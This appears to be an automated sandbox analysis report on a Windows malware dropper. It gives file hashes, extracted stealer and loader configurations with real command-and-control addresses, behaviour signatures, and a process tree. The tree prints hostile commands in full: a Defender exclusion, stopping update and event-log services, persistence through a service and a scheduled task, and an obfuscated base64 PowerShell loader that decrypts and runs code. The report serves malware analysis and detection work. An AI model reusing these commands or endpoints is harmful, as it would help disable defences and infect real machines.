Analysis

  • max time kernel
    88s
  • max time network
    130s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-05-2024 02:19

Errors

Reason
Machine shutdown

General

  • Target

    1af0090ffc936e296ff8097bfae2f215049c2edadb8826ad5d6647a7c41a53d6.exe

  • Size

    1.7MB

  • MD5

    11956bc787a56529d29f7f00b4af9192

  • SHA1

    eca8a989bee6ebde3e5ef2b9a116cb7e859f3c4e

  • SHA256

    1af0090ffc936e296ff8097bfae2f215049c2edadb8826ad5d6647a7c41a53d6

  • SHA512

    6a2c694adb16be5220823252a92d7f3480fa243883c9b1ca7c74fbc1a48c0adacce14436222a3bfabfdb34dc9066afa508b7b3f5e2a0c647660d9d28543a74b3

  • SSDEEP

    49152:zZmm1vTigRg9EXPL4ME8XTL2UorDkm+o7Dkz+TWthB:FmmhTxg2Xi8DL2UoHx+cDSnP

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 7 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • XMRig Miner payload 4 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 50 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 44 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 17 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 22 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1af0090ffc936e296ff8097bfae2f215049c2edadb8826ad5d6647a7c41a53d6.exe
    "C:\Users\Admin\AppData\Local\Temp\1af0090ffc936e296ff8097bfae2f215049c2edadb8826ad5d6647a7c41a53d6.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3916
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:3764
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:3280
        • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4564
            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
              "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1836
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4356
                • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3008
                • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                  7⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:684
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                  7⤵
                    PID:3548
                    • C:\Windows\SysWOW64\choice.exe
                      choice /C Y /N /D Y /T 3
                      8⤵
                        PID:2080
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 364
                    6⤵
                    • Program crash
                    PID:3944
                • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:1452
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                      PID:1636
                  • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4876
                  • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                    5⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Suspicious use of WriteProcessMemory
                    PID:3132
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:856
                      • C:\Windows\SysWOW64\sc.exe
                        Sc stop GameServerClient
                        7⤵
                        • Launches sc.exe
                        PID:3456
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService remove GameServerClient confirm
                        7⤵
                        • Executes dropped EXE
                        PID:1196
                      • C:\Windows\SysWOW64\sc.exe
                        Sc delete GameSyncLink
                        7⤵
                        • Launches sc.exe
                        PID:4276
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService remove GameSyncLink confirm
                        7⤵
                        • Executes dropped EXE
                        PID:1780
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:1940
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService start GameSyncLink
                        7⤵
                        • Executes dropped EXE
                        PID:3780
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                      6⤵
                        PID:760
                        • C:\Windows\SysWOW64\sc.exe
                          Sc stop GameServerClientC
                          7⤵
                          • Launches sc.exe
                          PID:1452
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove GameServerClientC confirm
                          7⤵
                          • Executes dropped EXE
                          PID:3340
                        • C:\Windows\SysWOW64\sc.exe
                          Sc delete PiercingNetLink
                          7⤵
                          • Launches sc.exe
                          PID:2292
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove PiercingNetLink confirm
                          7⤵
                          • Executes dropped EXE
                          PID:4828
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:3996
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService start PiercingNetLink
                          7⤵
                          • Executes dropped EXE
                          PID:2600
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                        6⤵
                          PID:1564
                          • C:\Windows\SysWOW64\sc.exe
                            Sc delete GameSyncLinks
                            7⤵
                            • Launches sc.exe
                            PID:1604
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService remove GameSyncLinks confirm
                            7⤵
                            • Executes dropped EXE
                            PID:2084
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:4520
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService start GameSyncLinks
                            7⤵
                            • Executes dropped EXE
                            PID:4056
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                          6⤵
                            PID:2244
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              7⤵
                                PID:2292
                          • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:3096
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              6⤵
                                PID:3376
                            • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1076
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                6⤵
                                  PID:2648
                              • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:1348
                                • C:\Windows\SysWOW64\schtasks.exe
                                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                                  6⤵
                                  • Creates scheduled task(s)
                                  PID:644
                                • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4724
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 476
                                    7⤵
                                    • Program crash
                                    PID:2788
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 500
                                    7⤵
                                    • Program crash
                                    PID:4828
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 784
                                    7⤵
                                    • Program crash
                                    PID:5096
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 804
                                    7⤵
                                    • Program crash
                                    PID:5168
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 824
                                    7⤵
                                    • Program crash
                                    PID:2244
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 872
                                    7⤵
                                    • Program crash
                                    PID:5924
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1048
                                    7⤵
                                    • Program crash
                                    PID:5232
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1048
                                    7⤵
                                    • Program crash
                                    PID:4808
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1160
                                    7⤵
                                    • Program crash
                                    PID:5420
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1440
                                    7⤵
                                    • Program crash
                                    PID:5744
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "dl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe" & exit
                                    7⤵
                                      PID:6072
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im "dl.exe" /f
                                        8⤵
                                        • Kills process with taskkill
                                        PID:5176
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1384
                                      7⤵
                                      • Program crash
                                      PID:3936
                                  • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks SCSI registry key(s)
                                    PID:4964
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 484
                                      7⤵
                                      • Program crash
                                      PID:1324
                                  • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3436
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      7⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:5664
                                    • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                      7⤵
                                        PID:6092
                                    • C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:6004
                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        7⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:3944
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        7⤵
                                          PID:3828
                                          • C:\Windows\system32\wusa.exe
                                            wusa /uninstall /kb:890830 /quiet /norestart
                                            8⤵
                                              PID:5952
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop UsoSvc
                                            7⤵
                                            • Launches sc.exe
                                            PID:5880
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                            7⤵
                                            • Launches sc.exe
                                            PID:808
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop wuauserv
                                            7⤵
                                            • Launches sc.exe
                                            PID:2916
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop bits
                                            7⤵
                                            • Launches sc.exe
                                            PID:5812
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop dosvc
                                            7⤵
                                            • Launches sc.exe
                                            PID:3380
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                            7⤵
                                              PID:5820
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                              7⤵
                                                PID:4972
                                              • C:\Windows\system32\powercfg.exe
                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                7⤵
                                                  PID:2912
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                  7⤵
                                                    PID:3652
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                    7⤵
                                                    • Launches sc.exe
                                                    PID:740
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                    7⤵
                                                    • Launches sc.exe
                                                    PID:5900
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe stop eventlog
                                                    7⤵
                                                    • Launches sc.exe
                                                    PID:5888
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe start "WSNKISKT"
                                                    7⤵
                                                    • Launches sc.exe
                                                    PID:2104
                                              • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:3428
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEMALAAgADAAeAA2AEYALAAgADAAeAAzADYALAAgADAAeAAwAEUALAAgADAAeAAyAEMALAAgADAAeAA0ADYALAAgADAAeAAwADMALAAgADAAeAA4AEMALAAgADAAeABCADUALAAgADAAeABGAEYALAAgADAAeAAxADAALAAgADAAeABBADUALAAgADAAeAAyADUALAAgADAAeAA4AEIALAAgADAAeAAxAEIALAAgADAAeAA3ADkALAAgADAAeABCAEMALAAgADAAeABBADUALAAgADAAeAAzADkALAAgADAAeAA0ADgALAAgADAAeABFADIALAAgADAAeAA2ADIALAAgADAAeAA4ADUALAAgADAAeAAyADgALAAgADAAeAAzADcALAAgADAAeABCAEYALAAgADAAeAA0ADEALAAgADAAeABBAEQALAAgADAAeAAxADgALAAgADAAeAAxADYALAAgADAAeAA5AEMALAAgADAAeAAwAEQAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADUARgAsACAAMAB4AEYAQwAsACAAMAB4ADgAQwAsACAAMAB4ADcAQwAsACAAMAB4ADMAOQAsACAAMAB4ADcANQAsACAAMAB4ADAAOQAsACAAMAB4AEYAQwAsACAAMAB4AEIAOQAsACAAMAB4ADcAMQAsACAAMAB4AEYAQwAsACAAMAB4AEUAQgAsACAAMAB4ADQAQQAsACAAMAB4AEUARQAsACAAMAB4AEIARgAsACAAMAB4ADcANgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2756
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                    7⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:684
                                                    • C:\Users\Admin\Pictures\n3TnNseQy60WUPwWv2DwgyVX.exe
                                                      "C:\Users\Admin\Pictures\n3TnNseQy60WUPwWv2DwgyVX.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:856
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 484
                                                        9⤵
                                                        • Program crash
                                                        PID:5856
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 484
                                                        9⤵
                                                        • Program crash
                                                        PID:3688
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 788
                                                        9⤵
                                                        • Program crash
                                                        PID:1156
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 808
                                                        9⤵
                                                        • Program crash
                                                        PID:3672
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 788
                                                        9⤵
                                                        • Program crash
                                                        PID:2096
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 780
                                                        9⤵
                                                        • Program crash
                                                        PID:3960
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 1048
                                                        9⤵
                                                        • Program crash
                                                        PID:4436
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 1060
                                                        9⤵
                                                        • Program crash
                                                        PID:3828
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 1320
                                                        9⤵
                                                        • Program crash
                                                        PID:2304
                                                    • C:\Users\Admin\Pictures\zp8JPCWcQK8CVuuldelczxNm.exe
                                                      "C:\Users\Admin\Pictures\zp8JPCWcQK8CVuuldelczxNm.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5548
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        9⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:3044
                                                    • C:\Users\Admin\Pictures\Gi3jobwxuwdPrc8bOfaTG4RT.exe
                                                      "C:\Users\Admin\Pictures\Gi3jobwxuwdPrc8bOfaTG4RT.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5868
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        9⤵
                                                        • Command and Scripting Interpreter: PowerShell
